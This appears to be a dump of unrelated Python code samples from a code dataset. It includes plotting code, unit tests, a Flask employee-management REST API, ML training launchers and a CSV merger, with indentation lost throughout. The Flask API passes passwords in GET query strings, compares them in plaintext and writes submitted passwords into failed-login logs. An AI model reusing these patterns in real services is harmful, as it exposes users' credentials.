fig = plt.figure(xx, figsize=(20, 10))
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax3 = ax1.twiny()
fig.subplots_adjust(bottom=0.2)
ax2.plot(temps, row[0], 'k', marker='x', label='Temperature (+/- 5 deg C)')
ax1.plot(disp_pct, row[1], 'blue', marker='o', label='Precipitation (+/- 50%)')
ax1.plot(disp_pct, row[2], 'purple', marker='^', label='Reference Evapotranspiration (+/- 50%)')
ax1.plot(disp_pct, row[3], 'brown', marker='h', label='Total Available Water (+/- 50%)')
ax3.plot(ndvi_range, row[4], 'green', marker='s', linestyle='-.', label='Normalized Density Vegetation\n'
' Index Conversion Factor (0.9 - 1.8)')
ax1.plot(disp_pct, row[5], 'red', marker='*', label='Soil Evaporation Layer Thickness (+/- 50%)')
ax1.set_xlabel(r"Parameter Change (%)", fontsize=16)
ax1.set_ylabel(r"Total Recharge per Year (mm)", fontsize=16)
ax2.set_xlabel(r"Temperature Change (C)", fontsize=16)
ax2.xaxis.set_ticks_position("bottom")
ax2.xaxis.set_label_position("bottom")
ax2.spines["bottom"].set_position(("axes", -0.15))
ax2.set_frame_on(True)
ax2.patch.set_visible(False)
for sp in ax2.spines.itervalues():
sp.set_visible(False)
ax2.spines['bottom'].set_visible(True)
ax3.set_xlabel(r"NDVI to Crop Coefficient Conversion Factor", fontsize=16)
ax3.xaxis.set_ticks_position("bottom")
ax3.xaxis.set_label_position("bottom")
ax3.spines["bottom"].set_position(("axes", -0.3))
ax3.set_frame_on(True)
ax3.patch.set_visible(False)
for sp in ax3.spines.itervalues():
sp.set_visible(False)
ax3.spines['bottom'].set_visible(True)
plt.title('Variation of ETRM Physical Parameters at {}'.format(index.replace('_', ' ')), y=1.08, fontsize=20)
handle1, label1 = ax1.get_legend_handles_labels()
handle2, label2 = ax2.get_legend_handles_labels()
handle3, label3 = ax3.get_legend_handles_labels()
handles, labels = handle1 + handle2 + handle3, label1 + label2 + label3
ax1.legend(handles, labels, loc=0)
plt.show()
plt.savefig('{}\\{}_spider_10JUL16_2'.format(fig_path, index), ext='png', figsize=(20, 10))
plt.close(fig)
|
StarcoderdataPython
|
1796065
|
# File name: test_libraries.py
# Author: <NAME>
# Date created: 23-08-2018
"""Tests buf.libraries."""
from unittest import TestCase, mock
import unittest
from buf import libraries
import os
import sys
import tempfile
class TestMakeDir(TestCase):
"""Tests buf.libraries.make_library."""
def test_already_exists(self):
"""Tests that the function raises an error if the directory it is trying to create already exists."""
with mock.patch("buf.libraries.os.path.exists", return_value = True):
with self.assertRaises(IsADirectoryError):
libraries.make_library_dir()
def test_proper_directory_creation(self):
"""Tests that the function properly creates a directory if none exists."""
with mock.patch("buf.libraries.os.path.exists", return_value = False):
with mock.patch("buf.libraries.os.mkdir") as mock_make_dir:
libraries.make_library_dir()
mock_make_dir.assert_called_with(libraries.library_dir)
class TestEnsureLibraryDirExists(TestCase):
"""Tests buf.libraries.ensure_library_dir_exists."""
def test_existence_check(self):
"""Tests that the function checks whether library_dir exists."""
with mock.patch("buf.libraries.os.path.exists", side_effect = SystemExit) as mock_check:
with self.assertRaises(SystemExit):
libraries.ensure_library_dir_exists()
mock_check.assert_called_with(libraries.library_dir)
def test_directory_creation(self):
"""Tests that the function actually makes library_dir if it doesn't exist."""
with mock.patch("buf.libraries.os.path.exists", return_value = False):
with mock.patch("buf.libraries.os.mkdir") as mock_make_dir:
libraries.ensure_library_dir_exists()
mock_make_dir.assert_called_with(libraries.library_dir)
class TestAddLibraryFile(TestCase):
"""Tests buf.libraries.add_library_file."""
def test_library_dir_existence_check(self):
"""Tests that the function ensures that library_dir has already been created."""
with mock.patch("buf.libraries.ensure_library_dir_exists", side_effect = SystemExit) as mock_check:
with self.assertRaises(SystemExit):
libraries.add_library_file("file.txt")
mock_check.assert_called()
def test_file_already_exists_check(self):
"""Tests that the function raises an error if the file it is trying to create already exists."""
with mock.patch("buf.libraries.os.path.exists", return_value = True):
with self.assertRaises(FileExistsError):
libraries.add_library_file("file.txt")
def test_proper_file_creation(self):
"""Tests that the function properly creates a directory if none exists."""
test_file_name = "file.txt"
test_file_path = os.path.join(sys.prefix, libraries.library_dir, test_file_name)
with mock.patch("buf.libraries.os.path.exists", return_value = False):
with mock.patch("buf.libraries.ensure_library_dir_exists"):
with mock.patch("buf.libraries.open") as mock_open:
libraries.add_library_file(test_file_name)
mock_open.assert_called_with(test_file_path, "w")
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
9733997
|
<reponame>SideShowBoBGOT/EPAM-project
"""
Module contains classes to work with REST API for Employees.
Classes:
EmployeesAPIget(Resource)
EmployeesAPIadd(Resource)
EmployeesAPIedit(Resource)
EmployeesAPIdel(Resource)
"""
from flask_restful import Resource, abort, reqparse
from flask import redirect
import os
import sys
import datetime
sys.path.append(os.path.abspath(os.path.join('..')))
from .common_funcs import check_empty_strings
from models.users import User
from models.departments import Departments
from models.employees import Employees
from f_logger import logger
from migrations.migrations_funcs import find_emp
from service import add_emp, change_emp, del_emp
get_args = reqparse.RequestParser()
get_args.add_argument("login", type=str, help="User`s login", required=True)
get_args.add_argument("password", type=str, help="<PASSWORD>`s password", required=True)
add_args = reqparse.RequestParser()
add_args.add_argument("login", type=str, help="User`s login", required=True)
add_args.add_argument("password", type=str, help="<PASSWORD>`<PASSWORD>", required=True)
add_args.add_argument("name", type=str, help="Name of new employee", required=True)
add_args.add_argument("department", type=str, help="Department of new employee", required=True)
add_args.add_argument("salary", type=str, help="Salary of new employee", required=True)
add_args.add_argument("birth_date", type=str, help="Birthdate of new employee", required=True)
add_args.add_argument("page", type=str, help="Redirects to prev page")
find_args = reqparse.RequestParser()
find_args.add_argument("login", type=str, help="User`s login", required=True)
find_args.add_argument("password", type=str, help="User`s password", required=True)
find_args.add_argument("from_date", type=str, help="Format: YYYY-mm-dd. Date from which employee is sought",
required=True)
find_args.add_argument("to_date", type=str, help="Format: YYYY-mm-dd. Date till which employee is sought",
required=True)
find_args.add_argument("page", type=str, help="Redirects to prev page")
edit_args = reqparse.RequestParser()
edit_args.add_argument("login", type=str, help="User`s login", required=True)
edit_args.add_argument("password", type=str, help="User`s password", required=True)
edit_args.add_argument("name", type=str, help="New name of the employee", required=True)
edit_args.add_argument("department", type=str, help="New department of the employee", required=True)
edit_args.add_argument("salary", type=str, help="New salary of the employee", required=True)
edit_args.add_argument("birth_date", type=str, help="New birthdate of the employee", required=True)
edit_args.add_argument("id", type=int, help="Id of the employee to edit", required=True)
edit_args.add_argument("page", type=str, help="Redirects to prev page")
del_args = reqparse.RequestParser()
del_args.add_argument("login", type=str, help="User`s login", required=True)
del_args.add_argument("password", type=str, help="<PASSWORD>`s password", required=True)
del_args.add_argument("id", type=int, help="Id of the employee to delete", required=True)
del_args.add_argument("page", type=str, help="Redirects to prev page")
class EmployeesAPIget(Resource):
"""
Class ,which is descendant of Resource, is responsible
for giving info about employees of the table.
Methods:
get(self)
"""
def get(self):
"""
Method overrides get method of Resource and
works on get method, giving info about employees,
only if credentials are correct.
:return: dict of user information
"""
args = get_args.parse_args()
login = args['login']
password = args['password']
user = User.query.filter_by(login=login).first()
if user and user.password == password:
employees_dict = dict()
employees = Employees.query.all()
for index, emp in enumerate(employees):
employees_dict[f'{index}'] = {'id': emp.id, 'name': emp.name,
'department': emp.department,
'salary': emp.salary,
'birth_date': str(emp.birth_date)}
return employees_dict
abort(401, error='CREDENTIALS_INCORRECT')
class EmployeesAPIadd(Resource):
"""
Class ,which is descendant of Resource, is responsible
for adding employees to the table.
Methods:
get(self)
"""
def get(self):
"""
Method overrides get method of Resource and
works on get method, adding employees,
only if arguments and credentials are correct.
:return: dict of messages or errors
"""
args = add_args.parse_args()
login = args['login']
password = args['password']
user = User.query.filter_by(login=login).first()
name = args['name']
department = args['department']
salary = args['salary']
birth_date = args['birth_date']
page = args.get('page')
if user and user.password == password and user.id == 1:
try:
birth_date = datetime.datetime.strptime(birth_date, '%Y-%m-%d').date()
salary = float(salary)
if Departments.query.filter_by(department=department).first() \
and check_empty_strings(name) and salary > 0:
add_emp(name, department, salary, birth_date)
logger.info(f'Added employee: name: "{name}"\tdepartment: "{department}"'
f'\tsalary: "{salary}"\tbirthdate: "{birth_date}"')
if page and page == 'True':
return redirect('/employees')
return {'message': 'ADD_SUCCESS'}
raise ValueError
except:
logger.info(f'Failed adding employee: name: "{name}"\tdepartment: "{department}"'
f'\tsalary: "{salary}"\tbirthdate: "{birth_date}"')
if page and page == 'True':
return redirect('/employees')
abort(406, error='ARGUMENTS_INCORRECT')
logger.info(f'Failed adding employee: incorrect login: "{login}" or password: "{password}"')
abort(401, error='CREDENTIALS_INCORRECT')
class EmployeesAPIfind(Resource):
"""
Class ,which is descendant of Resource, is responsible
for finding employees by date of birth.
Methods:
get(self)
"""
def get(self):
"""
Method overrides get method of Resource and
works on get method, finding employees by
date of birth, only if arguments and
credentials are correct.
:return: dict of messages or errors
"""
args = find_args.parse_args()
login = args['login']
password = args['password']
user = User.query.filter_by(login=login).first()
from_date = args['from_date']
to_date = args['to_date']
page = args.get('page')
if user and user.password == password:
try:
from_date = datetime.datetime.strptime(from_date, '%Y-%m-%d').date()
to_date = datetime.datetime.strptime(to_date, '%Y-%m-%d').date()
if to_date < from_date:
raise ValueError
employees = find_emp(from_date, to_date)
employees_dict = dict()
ids = ''
for index, emp in enumerate(employees):
employees_dict[f'{index}'] = {'id': emp.id, 'name': emp.name,
'department': emp.department,
'salary': emp.salary,
'birth_date': str(emp.birth_date)}
ids += str(emp.id) + '.'
logger.info(f'Found employees: from_date: "{from_date}"\tto_date: "{to_date}"')
if page and page == 'True':
if ''.join(ids.split('.')):
return redirect('/employees/' + ids[:-1])
return redirect('/employees')
return employees_dict
except:
logger.info(f'Failed finding employees: from_date: "{from_date}"\tto_date: "{to_date}"')
if page and page == 'True':
return redirect('/employees')
abort(406, error='ARGUMENTS_INCORRECT')
else:
logger.info(f'Failed adding employee: incorrect login: "{login}" or password: "{password}"')
abort(401, error='CREDENTIALS_INCORRECT')
class EmployeesAPIedit(Resource):
"""
Class ,which is descendant of Resource, is responsible
for editing employees of the table.
Methods:
get(self)
"""
def get(self):
"""
Method overrides get method of Resource and
works on get method, editing employees,
only if arguments and credentials are correct.
:return: dict of messages or errors
"""
args = edit_args.parse_args()
login = args['login']
password = args['password']
user = User.query.filter_by(login=login).first()
name = args['name']
department = args['department']
salary = args['salary']
birth_date = args['birth_date']
id = args['id']
page = args.get('page')
if user and user.password == password and user.id == 1:
try:
birth_date = datetime.datetime.strptime(birth_date, '%Y-%m-%d').date()
salary = float(salary)
if Employees.query.get(id) and Departments.query.filter_by(department=department).first() \
and check_empty_strings(name) and salary > 0:
change_emp(id, name, department, salary, birth_date)
logger.info(f'Edited employee: id: "{id}"\t name: "{name}"\tdepartment: "{department}"'
f'\tsalary: "{salary}"\tbirthdate: "{birth_date}"')
if page and page == 'True':
return redirect('/employees')
return {'message': 'EDIT_SUCCESS'}
raise ValueError
except:
logger.info(f'Failed editing employee: id: "{id}"\t name: "{name}"\tdepartment: "{department}"'
f'\tsalary: "{salary}"\tbirthdate: "{birth_date}"')
if page and page == 'True':
return redirect('/employees')
abort(406, error='ARGUMENTS_INCORRECT')
logger.info(f'Failed adding employee: incorrect login: "{login}" or password: "{password}"')
abort(401, error='CREDENTIALS_INCORRECT')
class EmployeesAPIdel(Resource):
"""
Class ,which is descendant of Resource, is responsible
for deleting employees from the table.
Methods:
get(self)
"""
def get(self):
"""
Method overrides get method of Resource and
works on get method, deleting employees,
only if arguments and credentials are correct.
:return: dict of messages or errors
"""
args = del_args.parse_args()
login = args['login']
password = args['password']
user = User.query.filter_by(login=login).first()
id = args['id']
page = args.get('page')
if user and user.password == password and user.id == 1:
if Employees.query.get(id):
del_emp(id)
logger.info(f'Deleted employee: id: "{id}"')
if page and page == 'True':
return redirect('/employees')
return {'message': 'DEL_SUCCESS'}
logger.info(f'Failed deleting employee: id: "{id}"')
if page and page == 'True':
return redirect('/employees')
abort(406, error='ARGUMENTS_INCORRECT')
logger.info(f'Failed adding employee: incorrect login: "{login}" or password: "{password}"')
abort(401, error='CREDENTIALS_INCORRECT')
|
StarcoderdataPython
|
1673420
|
<gh_stars>10-100
#import sys
# sys.path.insert(0, '/content/gdrive/MyDrive/Tese/code') # for colab
from src.classification_scripts.SupConLoss.train_supcon import FineTuneSupCon
from src.classification_scripts.ALS.train_ALSingle import FineTuneALS
from src.classification_scripts.cross_entropy.train_ce import FineTuneCE
from src.configs.setters.set_initializers import *
from src.captioning_scripts.baseline.train_baseline import TrainBaseline
from src.captioning_scripts.fusion.gpt2.train_gpt2 import TrainGPT2
from src.captioning_scripts.fusion.pegasus.train_pegasus import TrainPegasus
if TASK == 'Captioning':
if ARCHITECTURE == ARCHITECTURES.BASELINE.value:
# # initialize the class
_train = TrainBaseline(language_aux=None, pretrain = False,fine_tune_encoder=False, model_version = 'v2')
elif ARCHITECTURE == ARCHITECTURES.FUSION.value:
if AUX_LM == AUX_LMs.GPT2.value:
_train = TrainGPT2(language_aux=AUX_LM, fine_tune_encoder=False, model_version= 'v2')
elif AUX_LM == AUX_LMs.PEGASUS.value:
_train = TrainPegasus(language_aux=AUX_LM, pretrain = False, fine_tune_encoder=False, nr_inputs=1, model_version= 'v2')
# setup the vocab (size and word map)
_train._setup_vocab()
# init model
_train._init_model()
# load checkpoint if exists might need inputs variable if its pegasus ( multi input )
_train._load_weights_from_checkpoint(_train.decoder, _train.decoder_optimizer, _train.encoder, _train.encoder_optimizer, is_current_best=True, nr_inputs = _train.nr_inputs if ARCHITECTURES == ARCHITECTURES.FUSION.value
and AUX_LM == AUX_LMs.PEGASUS.value else 1)
# load dataloaders (train and val)
_train._setup_dataloaders()
# setup parameters for training
_train._setup_train(_train._train_critical if SELF_CRITICAL else _train._train, _train._validate)
elif TASK == 'Classification':
# to run extra epochs with a different loss
if EXTRA_EPOCHS:
logging.basicConfig(
format='%(levelname)s: %(message)s', level=logging.INFO)
logging.info('PRETRAINING ENCODER WITH EXTRA EPOCHS ON {}...'.format(LOSS))
if LOSS == LOSSES.SupConLoss.value:
model = FineTuneSupCon(model_type=ENCODER_MODEL, device=DEVICE, file = 'classification_scripts/encoder_training_details.txt', eff_net_version = 'v2')
elif LOSS == LOSSES.Cross_Entropy.value:
model = FineTuneCE(model_type=ENCODER_MODEL, device=DEVICE, file = 'classification_scripts/encoder_training_details.txt', eff_net_version = 'v2')
elif LOSS == LOSSES.ALS.value:
model = FineTuneALS(model_type=ENCODER_MODEL, device=DEVICE, file = 'classification_scripts/encoder_training_details.txt', eff_net_version = 'v2')
model._setup_train()
model._setup_transforms()
model._setup_dataloaders()
model.train(model.train_loader, model.val_loader)
else:
if LOSS == LOSSES.Cross_Entropy.value:
logging.basicConfig(
format='%(levelname)s: %(message)s', level=logging.INFO)
logging.info('PRETRAINING ENCODER WITH CROSS-ENTROPY...')
model = FineTuneCE(model_type=ENCODER_MODEL, device=DEVICE, file = 'classification_scripts/encoder_training_details.txt', eff_net_version = 'v2')
model._setup_train()
model._setup_transforms()
model._setup_dataloaders()
model.train(model.train_loader, model.val_loader)
elif LOSS == LOSSES.SupConLoss.value:
logging.basicConfig(
format='%(levelname)s: %(message)s', level=logging.INFO)
logging.info('PRETRAINING ENCODER WITH SUPERVISED CONTRASTIVE LOSS...')
model = FineTuneSupCon(model_type=ENCODER_MODEL, device=DEVICE, file = 'classification_scripts/encoder_training_details.txt', eff_net_version = 'v2')
model._setup_train()
model._setup_transforms()
model._setup_dataloaders()
model.train(model.train_loader, model.val_loader)
|
StarcoderdataPython
|
3333503
|
# -*- coding:utf-8 -*-
import pytest
from gitticket import github
from gitticket import ticket
from gitticket import config
from gitticket import util
def mock_git():
return {'ticket.name': 'user',
'ticket.repo': 'testrepo',
'ticket.service': 'github',
'ticket.format.list': 'list_format',
'ticket.format.show': 'show_format',
'ticket.format.comment': 'comment_format',
'ticket.github.token': 'github_token',
'ticket.bitbucket.token': 'bitbucket_token',
'ticket.bitbucket.token-secret': 'bitbucket_token_secret',
'ticket.redmine.url': 'http://example.com/',
'ticket.redmine.token': 'redmine_token',
'http.sslVerify': 'true'}
def mock_request_list(*args, **kwargs):
return [{u'body': u'body',
u'title': u"title",
u'url': u'https://api.github.com/repos/name/repo/issues/1',
u'pull_request': {u'diff_url': None, u'html_url': None, u'patch_url': None},
u'labels': [{u'color': u'fc2929', u'url': u'https://api.github.com/repos/name/repo/labels/bug', u'name': u'bug'}],
u'updated_at': u'2012-09-15T00:23:14Z',
u'html_url': u'https://github.com/name/repo/issues/1',
u'number': 1,
u'assignee': {u'url': u'https://api.github.com/users/name', u'login': u'name', u'avatar_url': u'http://example.com', u'id': 1, u'gravatar_id': u''},
u'state': u'closed',
u'user': {u'url': u'https://api.github.com/users/name', u'login': u'name', u'avatar_url': u'https://example.com', u'id': 1, u'gravatar_id': u''},
u'milestone': None,
u'id': 0,
u'closed_at': u'2012-09-15T00:23:14Z',
u'created_at': u'2012-09-15T00:19:10Z',
u'comments': 0}]
def mock_request_assignees(*args, **kwargs):
return [{u'login': u'name1'},
{u'login': u'name2'}]
def mock_request_show(*args, **kwargs):
return {u'body': u'body',
u'title': u"title",
u'url': u'https://api.github.com/repos/name/repo/issues/1',
u'pull_request': {u'diff_url': None, u'html_url': None, u'patch_url': None},
u'labels': [{u'color': u'fc2929', u'url': u'https://api.github.com/repos/name/repo/labels/bug', u'name': u'bug'}],
u'updated_at': u'2012-09-15T00:23:14Z',
u'html_url': u'https://github.com/name/repo/issues/1',
u'number': 1,
u'assignee': {u'url': u'https://api.github.com/users/name', u'login': u'name', u'avatar_url': u'http://example.com', u'id': 1, u'gravatar_id': u''},
u'state': u'closed',
u'user': {u'url': u'https://api.github.com/users/name', u'login': u'name', u'avatar_url': u'https://example.com', u'id': 1, u'gravatar_id': u''},
u'milestone': None,
u'id': 0,
u'closed_at': u'2012-09-15T00:23:14Z',
u'created_at': u'2012-09-15T00:19:10Z',
u'comments': 0}
def mock_request_comments(*args, **kwargs):
return [{"id": 1,
"url": "https://api.github.com/repos/octocat/Hello-World/issues/comments/1",
"body": "Me too",
"user": {
"login": "octocat",
"id": 1,
"avatar_url": "https://github.com/images/error/octocat_happy.gif",
"gravatar_id": "<PASSWORD>",
"url": "https://api.github.com/users/octocat"
},
"created_at": "2011-04-14T16:00:49Z",
"updated_at": "2011-04-14T16:00:49Z"
}]
def test_list(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(github, '_request', mock_request_list)
r = github.issues()
assert len(r) == 1
tic = r[0]
assert tic.title == u'title'
assert tic.body == u'body'
assert tic.assignee == u'name'
def test_show(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(github, '_request', mock_request_show)
tic = github.issue(0)
assert isinstance(tic, ticket.Ticket)
assert tic.title == u'title'
assert tic.body == u'body'
assert tic.assignee == u'name'
def test_comments(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(github, '_request', mock_request_comments)
r = github.comments(0)
assert len(r) == 1
com = r[0]
assert com.body == u'Me too'
assert com.creator == u'octocat'
def mock_editor(template):
return u'''## Available assignees: bug, duplicate, enhancement, invalid, question, wontfix
## Available labels: aflc
:title: test issue
:labels: bug
:assignee: name
:milestone_id:
:body: this is a body.
'''
def mock_labels():
return ['bug', 'duplicate', 'enhancement', 'invalid', 'question', 'wontfix']
def mock_assignees():
return ['name']
def test_add(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(util, 'inputwitheditor', mock_editor)
monkeypatch.setattr(github, '_request', mock_request_show)
monkeypatch.setattr(github, 'labels', mock_labels)
monkeypatch.setattr(github, 'assignees', mock_assignees)
r = github.add()
assert r['html_url'] == u'https://github.com/name/repo/issues/1'
assert r['number'] == 1
def test_update(monkeypatch):
"""TODO: Test with the content"""
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(util, 'inputwitheditor', mock_editor)
monkeypatch.setattr(github, '_request', mock_request_show)
monkeypatch.setattr(github, 'labels', mock_labels)
monkeypatch.setattr(github, 'assignees', mock_assignees)
github.update(1)
def test_changestate(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(github, '_request', mock_request_list)
github.changestate(1, 'open')
github.changestate(1, 'closed')
with pytest.raises(ValueError):
github.changestate(1, 'close')
def test_commentto(monkeypatch):
"""TODO: Test with the content"""
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(util, 'inputwitheditor', mock_editor)
monkeypatch.setattr(github, '_request', mock_request_show)
github.commentto(1)
def test_assignees(monkeypatch):
monkeypatch.setattr(config, 'git', mock_git)
monkeypatch.setattr(github, '_request', mock_request_assignees)
r = github.assignees()
assert len(r) == 2
assert r[0] == 'name1'
assert r[1] == 'name2'
def test_labels(monkeypatch):
assert False
|
StarcoderdataPython
|
5105491
|
<gh_stars>0
#!/usr/bin/env python
# concatenator for audit
import pandas as pd
from pathlib import Path
import numpy as np
import subprocess
import os
import sys
csv_dir = sys.argv[1]
#2 *rest*multiband*fsLR_desc-qc_bold.csv
cntr = 0
for csv_path in Path(csv_dir).rglob('sub-*rest*multiband*fsLR_desc-qc_bold.csv'):
cntr += 1
sub_df = pd.read_csv(str(csv_path))
columns = list(sub_df.columns)
if cntr > 0:
break
df = pd.DataFrame(np.nan, index=range(0,1), columns=columns, dtype="string")
print(df.columns)
for csv_path in Path(csv_dir).rglob('sub-*rest*multiband*fsLR_desc-qc_bold.csv'):
sub_df = pd.read_csv(str(csv_path))
df = pd.concat([df, sub_df])
df.dropna(how='all',inplace=True)
print("OUTPUT FILE", sys.argv[2])
print("OUTPUT", df.columns)
df.to_csv(sys.argv[2], index=False)
# THEN RUN THIS THROUGH THE SUMMARY REPORT SCRIPTS!
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.